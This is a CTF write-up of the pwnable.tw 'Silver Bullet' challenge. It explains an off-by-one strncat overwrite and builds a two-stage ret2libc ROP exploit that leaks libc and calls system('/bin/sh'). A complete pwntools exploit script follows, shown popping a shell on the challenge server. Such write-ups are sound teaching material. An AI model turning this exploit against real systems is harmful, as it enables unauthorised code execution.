Pwnable TW - Silver Bullet
Description
Please kill the werewolf with silver bullet!
nc chall.pwnable.tw 10103
ACT_0x01: What Do?
Alright! So to start off our challenge, letās just do the classic holy combo of file
, checksec
, and also just running the damn thing. Oh, and a little tool I came across called cwe_checker
, itās a PITA to install, but super cool when it works! Also, I canāt run the damn thing, so Iāll also be using pwninit
to set up my exploit environment and auto patch the binary. Saves so much time.
file:
$> file silver_bullet
silver_bullet: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2
.6.32, BuildID[sha1]=8c95d92edf8bf47b6c9c450e882b7142bf656a92, not stripped
The actually useful parts of this are the not stripped
, the 32-bit
part. Also whether or not itās dynamically or statically linked.
So far we have an unstripped 32-bit executable. Only reason I care about the 32-bit part is in case we come across a vuln that requires brute-forcing an address. 64-bit makes the brute-force process take longer than the heat death of the universe so best to avoid that.
checksec:
$> checksec silver_bullet
[*] '/home/exiled/Desktop/ctf/pwnable_tw/silvery_2/silver_bullet'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
Full RELRO, but no canary, PIE/ASLR, and we get symbols. Wack.
Quick recap on what full RELRO is, it just relocates the GOT section and also makes it read-only. Proof in case you donāt believe me.
The important excerpts are as follows:
Firstly, PLT needs to be located at a fixed offset from the .text section. Secondly, since GOT contains data used by different parts of the program directly, it needs to be allocated at a known static address in memory. Lastly, and more importantly, because the GOT is lazily bound it needs to be writable. -SNIP-
Basically Full RELRO makes overwriting this GOT impossible, free/malloc hook overwrites, ROP, and most other attacks are all still on the table :3.
Running it:
$> ./silver_bullet
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :
All hail our lord and savior, menu chall! Anyways, weāll figure out what the menus do in a sec. Oh, btw Iām using pwninit
to actually be able to run this binary, because Iām too lazy to actually learn to use a docker pwn environment.
CWE Checker
Aight, this one doesnāt always work so ĀÆ\_(ć)_/ĀÆ
>$ cwe_checker silver_bullet
[CWE676] (0.1) (Use of Potentially Dangerous Function) create_bullet (08048840) -> strlen
[CWE676] (0.1) (Use of Potentially Dangerous Function) power_up (08048889) -> memset
[CWE676] (0.1) (Use of Potentially Dangerous Function) power_up (080488fb) -> strncat
[CWE676] (0.1) (Use of Potentially Dangerous Function) power_up (08048907) -> strlen
[CWE676] (0.1) (Use of Potentially Dangerous Function) main (0804896e) -> memset
Oh sick it actually did something. Okay so Iāll start off by mainly looking at the power_up
and create_bullet
functions. Mainly due to the fact that simply touching a string in C is practically undefined behavior xd. What specifically catches my eye here is the strncat
call, since why tf would you use strncat
over just snprintf
. Also, string manipulation in C is pretty shit, and people always suck at remembering the null byte, or they miscalculate the length, mess up their buffer, etc. The list goes on.
Tbh I forgot what strncat
does anyways so lets pull up the man pages to refresh our mind palaces.
Boring but useful readingā¦
$> man strncat
Blah blah, synopsis, blah blah description, blah blah examples
Synopsis
char *strncat(char *restrict dst, const char src[restrict .ssize], size_t ssize);
Return value
strncat returns dst
..snip..
And description (cut for usefulness):
Blah blah, function appends bytes from the array pointed to by src, followed by a null character, to the end of the string pointed to by dst. dst must point to a string contained in a buffer that is large enough, that is, the buffer size must be at least strlen(dst) + strnlen(src, ssize) + 1.
Oh, no wonder people screw the function up, tf is this buffer length requirementā¦ wdym the buffer size must be at least strlen(dst) + strnlen(src, ssize) + 1
.
So you gotta make sure that the strlen != ssize
otherwise the null byte overwrites dst
by oneā¦ bruh. Anyways, lets run the rest of the program then finally load it into your preferred decompiler.
Nah Iām not done clowning on this, what even is this example.
The last part of recon I swear.
Okay, finally lets just see the last menus.
Menu 1: Make it
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :1
Give me your description of bullet :rawrxd
Your power is : 6
Good luck !!
Aight, so place for user input and the āpowerā is the length of our input.
Menu 2: UNLIMITED POWERRRR
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :2
Give me your another description of bullet :uwu
Your new power is : 9
Enjoy it !
Aight, so the second menu adds N, N+1 input lengths together (confirmed b/c I added āboogaā and got a power of 14).
Menu 3: Beat it
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :3
>----------- Werewolf -----------<
+ NAME : Gin
+ HP : 2147483647
>--------------------------------<
Try to beat it .....
Sorry ... It still alive !!
Give me more power !!
Aight, does some random stuff and the āwerewolfā has INT_MAX health.
Thatās a thicc boi.
Aight, lets load up binja.
ACT_0x02: REEEV YOUR ENGIIIINES
Main
Yes, I do use the Rust IL in Binja, why? Because itās nice. Actual reason is because of explicit mut/non mut, easy differentiation of signed vs unsigned datatypes and return types, loop being better than BS while loops, match ergonomics, etc.
Aight, we got main here, the init_proc
function is just classic CTF buffering setup, so we donāt care. The rest is just a classic menu challenge, nothing interesting yet.
Only thing we see is that var_40
variable that gets passed into beat
. Currently the functions we care about in order are: create_bullet
, power_up
, beat
Gimme Some Silver
Pretty standard, only interesting part is that weāre dereferencing a pointer to check if itās null. So weāre probably dealing with some kind of struct, and something inside it is 0x30
bytes. Then weāre initializing some integer field in that struct to the number of characters we pass as our input.
The read_input
function is about as standard as it comes too, it goes character by character, looks for a newline, and null terminates our string.
boring- letās move on.
Power Up
Hmm, aight so from the top, the parts I immediately see that look interesting are:
Yeaaah,
arg1
is definitely a struct, of at least size0x30
. Binja makes auto structs but for the Ghidra and (surprisingly) Ida users Iāll set up what I think the struct is in a sec.We have to create the bullet first before powering up
After making a bullet with random user input we can use
power_up
to add another description, from there we use theread_input
func into thatvar_38
buffer based off the remaining power of ourarg1
struct.ā Ayo, now we
strncat
into thatvar_38
buffer where the size is based off our remaining power.- What makes this fishy is that we control the bytes given into
arg1
when we first create the objectā¦
- What makes this fishy is that we control the bytes given into
Okay lets rename some stuff and make the struct for the powered up thingie.
Upgrades People, Upgrades
First letās take care of the struct definition, based off the null check on if *(arg1 ..) == 0
, and since the creation of a bullet requires us to give a bullet description, Iām gonna go out on a limb and say that arg1->offset(0)
is the beginning of our description bullet_buf
. And since we read 0x30
bytes into our bullet description, letās just assume thatās the size.
Last part is arg1->offset(0x30)
, this partās checked to make sure that itās below 48 (0x30 in hex), and considering the puts
string talking about increasing power, weāll just go ahead and assume that itās just an int. So altogether we got:
struct bullet {
char[0x30] bullet_buf;
int power;
}
Much better š.
Strncat? More like, uhhhā¦
Aight, so to recap:
- We control the initial bullet power and buffer contents.
- ā Strncat absolutely sucks because you gotta make sure that the
strlen(str) != size_n
, otherwise you get rekt by the null byte thatstrncat
writes at the end. Or, for the rustaceans,bullet.byte_offset(0x30) + 1 = 0x0
. - As long as we donāt crash the program, if we somehow get rid of the null byte at the end of our bullet buffer, weāll probably get a massive power, since
strlen
keeps going until it bumps into a terminating null byte. - The bullet power gets set again after our string tomfoolery.
Anyways, letās take a closer look at this line again since Iām almost 90% sure this is the initial vuln.
strncat(bullet, &buf, 0x30 - bullet->power);
So if our bullet creation input is rawrxd
, the bullet->power
is 6, after that we have an ssize
of 0x30 - 6 = 0x2a
.
Upon entering the power_up
function, that strncat will basically be
strncat(bullet_buf, &user_input, 0x2a)
Oh, btw, remember that null byte? Yeah keep in mind that whatever we pass in will basically end up being size + 1
.
A VULN?
So you might ask, what happens if we all but fill up the buffer on creation with 0x30 - 1
bytes? Just enough to not trigger the āNO MORE INPUTā part of the code, then power_up
?
Well, me personally? I smell a one byte overwrite š.
How does this help us though? Itās not like weāre working with the heap, and itās not like weāre anywhere near the return address, hows one measly byte help us?
Well, remember that random observation we made analyzing power_up
?
As long as we donāt crash the program, if we somehow get rid of the null byte at the end of our bullet buffer due to the fact that the power will write into the place where the null terminator is supposed to be, so weāll probably get a massive power, since
strlen
keeps going until it bumps into a currently non-existent null byte.
Well itās time to put our money where our mouth is and try it out.
ACT_0x03: You only get ONE byte of my sandwich.
Sick, now that our reversing is done, letās try out our hunches. I donāt know how many Aās is 47 so itās your turn iPython
.
$> ipython3
In [1]: "A"*(0x30-1)
Out[1]: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Yoink. Run it DJ.
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :1
Give me your description of bullet :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Your power is : 47
Good luck !!
The following inputs were weird O.o
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :2
Give me your another description of bullet :A
Your new power is : 1
Enjoy it !
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :Invalid choice
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :
AYO WE WERE RIGHT!! And the āInvalid choiceā is absolutely coming from the null byte or some weird thing, idrc though. BUT SICK! Hold up though, our powerās one? Why? We should have written a 1 into the null byte at the end of the buffer (Remember, the power gets reassigned after our strncat
call) and the new power should have gotten reassigned into whatever garbage value(s) was after our buffer.
OH WAIT, Iām dumb, I misread the code,
read_input(&buf, 0x30 - bullet->power);
strncat(bullet, &buf, 0x30 - bullet->power);
let remaining_bytes: size_t = strlen(&buf);
let new_power: i32 = bullet->power + remaining_bytes;
Yes, the power gets reassigned, but weāre getting the strlen
of the temporary buffer, not our bullet buffer. The temp buffer getās written to by the read_input
call before the strncat
jank-ness. So the temporary buffer actually does have 1 byte from our first power_up
call.
Howeeeeverā¦ Once we leave and re-call power_up
, our buffer concats our ridiculous garbage values and that definitely gives us enough power to take out the werewolf.
Boss Fight
Continuing from the above state.
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :2
Give me your another description of bullet :BBBBBBBBCCCCCCCC
Your new power is : 1111638545
Enjoy it !
Now would you LOOK at that, we were right! And not only that, our hunch was pretty spot on, although I have no clue exactly how the power value gets calculated. To figure that out Iād have to gdb
into the program and so far it doesnāt seem worth the effort yet. However, THEORETICALLY, we should be writing over the bullet struct and into wherever that is. I swear weāll gdb
and figure out exactly whatās happening in a bit, for now I like to imagine Iām on a time crunch for a CTF so lets keep going until we need more in depth info, for now 1111638545
is pretty dang close to MAX_INT
size so we should be able to beat the wolf! (Oh wait I forgot to look at that functionā¦ Eh, hopefully itās not a single shot).
Hopefully Not Foreshadowing
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :3
>----------- Werewolf -----------<
+ NAME : Gin
+ HP : 2147483647
>--------------------------------<
Try to beat it .....
Sorry ... It still alive !!
Give me more power !!
+++++++++++++++++++++++++++
Silver Bullet
+++++++++++++++++++++++++++
1. Create a Silver Bullet
2. Power up Silver Bullet
3. Beat the Werewolf
4. Return
+++++++++++++++++++++++++++
Your choice :3
>----------- Werewolf -----------<
+ NAME : Gin
+ HP : 1035845102
>--------------------------------<
Try to beat it .....
Oh ! You win !!
fish: Job 2, './silver_bullet_patched' terminated by signal SIGSEGV (Address boundary error)
WAIT, NOT FORESHADOWING AT ALL! Tbh I was fully prepared for another chapter where the whole goal was to find the PERFECT input to get exactly the max integer size. Praise the sun lads.
Hol up.
fish: Job 2, ā./silver_bullet_patchedā terminated by signal SIGSEGV (Address boundary error)
ALSO, AYO THATāS A STACK SMASH (probably). Time to boot up gdb to see whatās going on, and also start working on our exploit script. We should at least set up the menu manipulation portion so that when we eventually get an idea for an exploit we donāt have to care about buffering and just worry about the concepts.
ACT_0x04: Really? In Front Of My Salad?
Aight, letās lay out the goals of our debug sesh:
- Figure out wtf is happening once we beat the werewolf.
- Maybe see what the correlation between inputs and the third power calculation (the one that gives us the thicc values).
- See if we have control over the return address.
With that laid out, letās beat this big bad wolf xd.
Hack and Slash
Sweetness! So I personally use pwninit to set up my environment. Pretty much all we have to do is type pwninit
inside the directory our challenge is in and if weāre provided a libc file itāll just go and grab the relevant linker, give you libc symbols, create an exploit script for you, pay for your college, save your dog from a burning building, etc!
Okay, listen I never said it was perfectā¦
Ooo look, shiny exploit script over there!
Exploit Script!
#!/usr/bin/env python3
from pwn import *
exe = ELF("./silver_bullet_patched")
libc = ELF("./libc_32.so.6")
ld = ELF("./ld-2.23.so")
context.binary = exe
ru = lambda *x, **y: p.recvuntil(*x, **y)
rl = lambda *x, **y: p.recvline(*x, **y)
rc = lambda *x, **y: p.recv(*x, **y)
sla = lambda *x, **y: p.sendlineafter(*x, **y)
sa = lambda *x, **y: p.sendafter(*x, **y)
sl = lambda *x, **y: p.sendline(*x, **y)
sn = lambda *x, **y: p.send(*x, **y)
if args.REMOTE:
p = connect("addr", 1337)
elif args.GDB:
# If there's stupid timers:
# handle SIGALRM ignore
gdb_script = """
b main
c
"""
p = gdb.debug([exe.path], gdb_script)
else:
p = process([exe.path]) # For swapping to pwninit.
def create(bul_desc):
sla(b"Your choice :", b"1") # Create
sla(b"Give me your description of bullet :",bul_desc)
ru(b"Good luck !!\n")
def power_up(bul_desc):
sla(b"Your choice :", b"2") # Power up
sla(b"Give me your another description of bullet :", bul_desc)
ru(b"Enjoy it !\n")
def beat():
sla(b"Your choice :", b"3") # Power up
create(b"A"*(0x30-1))# Create
power_up(b"A")
beat() # Beat
# Tick 197 Certified ;)
p.interactive()
Donāt mind all my shorthands, Iām lazy and donāt want to type p.sendlineafter
;-;.
Essentially all weāre doing is exactly what we found during reversing and playing with the binary:
- First we create a bullet with 47 characters
- Power that bullet up and add a single character.
- Beat up the wolf.
I explained the reason this is a vulnerability a bit above but a super quick overview is that weāre creating a buffer of 47 characters in a struct that looks like:
struct bullet {
char[48] bullet_buf;
int power;
}
Last Time on Dragon Ball
The strlen
function only reads up to (not including) the null byte of the string which sets the power
field to 47. Afterwards we can still use the power_up
function again to add another character, which places a character in the 48th index of the buffer. HOWEVER it also places the null byte (or a 0) in the bullet->power
field, which immediately gets replaced by the length of our length 1 bullet.
Hereās the code again, with some comments. Also Iām going to use a 0 in place of a null bytes ascii value because itās easier to show that, since otherwise using \x00
takes up 4 characters.
..snip
// Before strcat bullet looks like
// A * 47 + null byte
// bullet->bullet_buff = [AAAAAA..AAAAAA0]
// bullet->power = 47
strncat(bullet, &temp_desc, 0x30 - bullet->power);
// After strcat:
// A * 48 + null byte
// bullet->bullet_buff = [AAAAAA..AAAAAAA]0
// bullet->power = 0----------------^
And hereās a beautiful MSPaint drawing showing the concept for those of you on mobile :3
Immediately afterwards we have
let new_len: size_t = strlen(&temp_desc);
let new_power: i32 = bullet->power + new_len;
Which turns that 0
into a 1
! Then afterwards the big ass number comes from the program overwriting stuff.
Okay recap over, hereās a-
Pwnnut Butter and Gef-fy Sandwich
Okay, so lets put some breakpoints at the interesting places, specifically at the strncat
and read_input
calls. Which also lets us see the bullet in memory both before the concat, and after.
Okay, looking good so far! Weāve filled up the memory just up to the end of the buffer with the null byte taking the 48th spot and not counting for our length like so:
0xfff16b24: 0x41414141 0x41414141 0x41414141 0x00414141
Lets move onto the strcat
part.
Immediately after it we were pretty much spot on with our reasoning, the power gets overwritten like expected. Now itāll get written into with the new strlen.
Great! And now that our power is set to 1 again, letās power up and abuse strncat to write past our buffer and overwrite the return address.
Before the strncat
:
After the strncat
:
As we can see in our expressions tab, weāve overwritten way past our buffer (Also during this time I updated my layout view a lot so now you get binary ninja decompilation on the right of the disassembly! :3).
Also hereās where we get the big number for the power, turns out it was just subtracting one from a bunch of Aās lol.
And now for the fun part, hereās where we overwrite the base pointer of the stack (EBP)! Basically what this means for us is the next time we return without adding something else to the stack base pointer weāll be able to overwrite the return pointer, the main way we can do that just so happens to be by beating the wolf, then the program completes and we should be ready for the last stretch!
Weāve already shown that we can beat the wolf so lets skip to the aftermath.
And just like that, weāre in
Well not exactly, we overwrote this part of the program so what now? The program has the NX
bit enabled so we canāt just write shellcode and run it. Well, thatās where ROP
comes in!!
ACT_0x05: Hand Me My ROP, Iām Going In!
Basically ROP
is the process of abusing the fact that every single program in the world has assembly instructions that HAVE to be able to execute, otherwise youāre just left with a really expensive electric rock with a bitten apple on the back. Weāre going to take advantage of that and basically make a program using the little instructions that exist within. Pretty much program-ception.
Now, I already checked and sadly we canāt just call execve("//bin/sh", 0, 0)
, although the funny part is that weāre just missing the int 0x80
call lol. Here you can see in my iPython
window, btw fun tip, you can actually set up a mini pwn script in iPython
to play around with things like making a chain of ROP
instructions without having to run the program to test your theories every time.
In [34]: r = ROP(exe)
In [35]: r.execve("//bin/sh", 0, 0)
[ERROR] Could not find any instructions in ['int 0x80']
PwnlibException: Could not find any instructions in ['int 0x80']
Like fr, call me inspector gadget:
So now we go to plan B:
Return to Monke- I mean Libc
So in order for this plan to work, if the random assembly gadgets found in the program wonāt work, the ones in the programs libc definitely will! The only downside is getting there :(
In order for us to just hop around, we have to print out an address related to libc. Luckily we happen to have a very pretty table of libc addresses in the PLT
and GOT
.
The what?
The GOT
or Global Offset Table is a big table of just straight up addresses thatāre passed to the program every time it starts by the linker (not when it was created). And it literally looks like this:
A straight up table of addresses that exist within the program straight into libc.
One little thing about libc is that, as a library, it has its addresss space layout randomized every time the program runs. However, we can take advantage of the fact that the randomized value doesnāt actually move/randomize everything, thatād be a nightmare for a fast program. Instead, a random value gets added to the beginning of the program as padding and moves the entire program around every time it starts up, essentially preventing us from calling functions like execve
. This isnāt a perfect protection though because we can just jump around, but it has to be relative to something.
Pretty MSPaint incoming:
So what this means is that we just need to print out something like foo
and weāll have the ability to jump anywhere again because weāll be hopping around relative to the location of foo
. To do this, weāll just take advantage of the
Procedure Linkage Table :3
So if the GOT
was a straight up table of just addresses, how are those addresses called? Enter the PLT!
This little linkage table is in charge of grabbing addresses from the GOT
, and actually having the instructions to jump into that address in a shared library (like libc).
And hereās what that looks like:
The PLT calls the actual functions that are referenced in the GOT. They work in harmony to give a program stuff it can use.
One small thing though, it doesnāt really care what calls it at all, and itās located within an area in memory that isnāt randomized (b/c of no ASLR/PIE in the binary), so we can ALSO randomly call one of those functions by simply jumping into the PLT!
Jump you say?
Great! So all we have to do is call the PLT implementation of puts
and pass it the arguments it expects, which is just an address, then itās game over!
Lets go over the additional parts of the exploit script:
offset = 0x30
puts_plt = exe.plt['puts']
puts_got = exe.got['puts']
payload = b"B" * offset
sla(b"Give me your another description of bullet :", payload) # Overwrite stuff
sla(b"Your choice :", b"3") # Beat
sla(b"Your choice :", b"3") # Beat
So this gets us the addresses of the PLT
and GOT
parts of puts
, weāre going to essentially be taking these and setting up the program in such a way that we can execute
puts_plt(puts_got)
Which just means taking the puts
, loading the address of puts_got
into the EDI
register, then calliing puts_plt
! From here I just need to get the exact offset for our overwrite, so Iām going to use a cyclic
string to get the offset like so:
$ā» pwn cyclic 48
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaa
Pass it into the program, which will crash like so:
And we can take that and look up the exact offset it takes to overwrite the return address with cyclic -l 0x61616361
, giving us an offset of 7
. So letās set our offset
in the pwn script to 7
, then we can make our little things! Iām going to use my iPython window to experiment with everything instead of doing the ROP manually, which Iād only have to do with really weird gadgets. Also Iām going to use pwntools
to automate the boring parts of the rop chain, which would basically just be me grabbing the address of puts, main, and the puts_plt
address, and chaining them together (Itās just easier this way).
In [45]: rop = ROP(exe)
In [46]: rop.puts(exe.got['puts'])
In [48]: rop.call(exe.sym['main'])
In [49]: print(rop.dump())
0x0000: 0x80484a8 puts(0x804afdc)
0x0004: 0x8048954 0x8048954()
0x0008: 0x804afdc got.puts
Perfect! Our automated chain found the gadgets necessary to place the address of puts_got
into our puts_plt
call, and it popped out a nice little chain that we can use in our script like so:
r = ROP(exe)
# ..snip
offset = 7
puts_got = exe.got['puts']
# ..snip, skip the create and power up stuff
r.puts(puts_got)
r.call(exe.sym.main)
# This auto calls puts_plt
payload = flat(
b"B"*offset,
r.chain(), # Calls puts with the got puts address.
p64(exe.sym.main), # Lastly, calls main
)
So here Iām making a payload to send to the program. By this point weāve gotten to the 3rd power up where we can overwrite stuff. So now letās beat it and take this home.
Home Stretch
Our current script (minus the menu stuff):
create(b"A" * (0x30-1))
power_up(b"A")
# --- Overwrite parts
offset = 7
puts_plt = exe.plt['puts']
puts_got = exe.got['puts']
# This changes r.chain() to include those instructions we saw.
r.puts(puts_got)
r.call(0x80487e7)
# 0x0000: 0x80484a8 puts(0x804afdc)
# 0x0004: 0x8048954 0x8048954()
# 0x0008: 0x804afdc got.puts
payload = flat(
b"C"*offset,
r.chain(), # Calls puts with the got puts address.
b"DDDD"
)
power_up(payload)
beat()
beat()
ru(b"Oh ! You win !!")
rl() # Grab junk
# Grab the libc leak
leak = u32(rl()[:-1])
#^ Get rid of the newline at the end, then unpack it
print(f"=== leakin all by yourself handsome :3 ? {hex(leak)}")
libc.address = leak - libc.sym.puts
So after executing our script, weāre rewarded with a leak of libc!
The @\xc1\xe7\x7f
is the result of printing out the GOT
address of puts! Only downside is now we have to beat the wolf again to complete the second part of our exploit. But now we have the ability to jump anywhere in libc, and also call whatever we want, from here itās smooth sailing and weāre just going to call system
with the /bin/sh
string, which will give us a shell!
Final Final Stretch
Hereās the part 2 of our script since we need to ābeatā the wolf again.
# --- Part 2: We gotta beat this bitch again >.>
rop2 = ROP(libc) # Generate a rop chain using the libc we leaked
rop2.system(bin_sh) # Call system('/bin/sh')
rop2.exit()
# Exit or any valid pointer to not crash the program
# 0x0000: 0xf7e57940 system(0xf7f75e8b)
# 0x0004: 0xf7e4b7b0 exit()
# 0x0008: 0xf7f75e8b arg0 = "/bin/sh\x00"
payload2 = flat(
b"D" * offset,
rop2.chain()
)
info("Round 2 FIGHT")
create(b"A"*(0x30-1))
power_up(b"A")
# Make our second rop chain
power_up(payload2)
beat()
beat()
Pretty much just the same flow for the first one, except our payload is slightly different, and this time because we used libc.address = leak - libc.sym.puts
, we automatically get the base of libc, and can now call things by creating an automatic rop-chain based off libc instead of just our program! So we can literally just use rop2.execve
or rop2.system
with whatever input we want and itās game over! Now to rest it on remote!
[+] Opening connection to chall.pwnable.tw on port 10103: Done
[-]..snip
Your choice :
[*] Sending payload3 here
[*] Switching to interactive mode
>----------- Werewolf -----------<
+ NAME : Gin
+ HP : 1002159083
>--------------------------------<
Try to beat it .....
Oh ! You win !!
$ ls
bin
boot
dev
etc
home
$ cd home
$ ls
silver_bullet
$ cd silver_bullet
$ ls
flag
run.sh
silver_bullet
$ cat flag
FLAG{n0t_r3al_f14g_btw_:3}
Perfect! Hope you enjoyed!
Full exploit script:
And hereās the final exploit script if you wanted to go through it, itās got a lot of stuff thatās specific to me though, like all the shorthands, but you can replace it with the long-form versions if it doesnāt make sense.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./silver_bullet_patched")
libc = ELF("./libc_32.so.6")
ld = ELF("./ld-2.23.so")
context.binary = exe
r = ROP(exe)
ru = lambda *x, **y: print(p.recvuntil(*x, **y))
rl = lambda *x, **y: p.recvline(*x, **y)
rc = lambda *x, **y: p.recv(*x, **y)
sla = lambda *x, **y: print(p.sendlineafter(*x, **y).decode())
sa = lambda *x, **y: p.sendafter(*x, **y)
sl = lambda *x, **y: p.sendline(*x, **y)
sn = lambda *x, **y: p.send(*x, **y)
if args.REMOTE:
p = remote("chall.pwnable.tw", 10103)
elif args.GDB:
# If there's stupid timers:
# handle SIGALRM ignore
gdb_script = """
cwatch execute "x/16xw 0xffffcfe8"
# b *0x80488dd
# ^ read_input call
# b *0x80488fb
# ^ strncat call
b beat
b *0x80487fa
# ^ After the beat function
b *0x8048a19
# ^ after the last beats and exit to main where we call puts@plt(puts@got)
c
"""
p = gdb.debug([exe.path], gdb_script, aslr=False)
else:
p = process([exe.path])
def create(bul_desc):
sla(b"Your choice :", b"1") # Create
sla(b"Give me your description of bullet :",bul_desc)
ru(b"Good luck !!\n")
def power_up(bul_desc):
sla(b"Your choice :", b"2") # Power up
sla(b"Give me your another description of bullet :", bul_desc)
ru(b"Enjoy it !\n")
def beat():
sla(b"Your choice :", b"3") # Power up
# Overwrite a bunch of stuff before we beat
create(b"A" * (0x30-1))
power_up(b"A")
# --- Overwrite parts
offset = 7
puts_plt = exe.plt['puts']
# Ended up not using this btw, since r.puts already calls puts@plt
puts_got = exe.got['puts']
# This changes r.chain() to include those instructions we saw.
r.puts(puts_got)
r.call(exe.sym['main'])
# 0x0000: 0x80484a8 puts(0x804afdc)
# 0x0004: 0x8048954 0x8048954()
# 0x0008: 0x804afdc got.puts
payload = flat(
b"C"*offset,
r.chain(), # Calls puts with the got puts address.
)
power_up(payload)
beat()
beat()
ru(b"Oh ! You win !!")
rl() # Grab junk
# Grab the libc leak
leak = u32(rl()[:-1]) # Get rid of the newline at the end, then unpack it
print(f"=== leaky? {hex(leak)}")
libc.address = leak - libc.sym.puts
bin_sh = next(libc.search("/bin/sh\x00"))
info(f"libc addr: {hex(libc.address)}")
info(f"bin sh: {hex(bin_sh)}")
info(f"system: {hex(libc.sym['system'])}")
# --- Part 2: We gotta beat this bitch again >.>
rop2 = ROP(libc) # Generate a rop chain using the libc we leaked
rop2.system(bin_sh) # Call system('/bin/sh')
rop2.exit()
payload2 = flat(
b"D" * offset,
rop2.chain()
)
info("Round 2 FIGHT")
create(b"A"*(0x30-1))
power_up(b"A")
# Make our second rop chain
info("Sending payload here")
power_up(payload2)
beat()
beat()
info("Sending payload3 here")
p.interactive()
# Tick 197 Certified ;)
Useless Stuff
Incoming: Me losing my mind because the history books are wrong. Plz skip this section if you donāt care about the history of the introduction of ASLR because I spent a full day searching and going crazy.
Soā¦ small ass aside, trying to google for when ASLR was introduced into the Linux kernel is ridiculous. The only mention I ever found references a Linux team called PaX that supposedly added a patch for address space layout randomization. However the ONLY thing I could find was this Linux mailing list thread made by Arjan van de Ven in 2005 which is here.
However, I wasnāt satisfied because in that exact same email, it was mentioned that the 64Kb randomization was to replace existing randomization that was there from something else. This search led me to the PaX site, which in 2001 has various mentions of patches, but looking through them they seemed to just be the foundations for Non Executable (NX) bits.
The ONLY thing I ever found was a linux patch which was ADDED in 2002. And this is backed up by a Phrack magazine article on this which was released in 2002 about how to bypass ASLR protection that ALSO mentioned that a COUPLE months prior the PaX team had released a thing called et_dyn.zip
(canāt find its existance at all fml), and AFTERWARDS released a patch introducing it into the kernel. Anyways Googleās wrong, I can breathe now.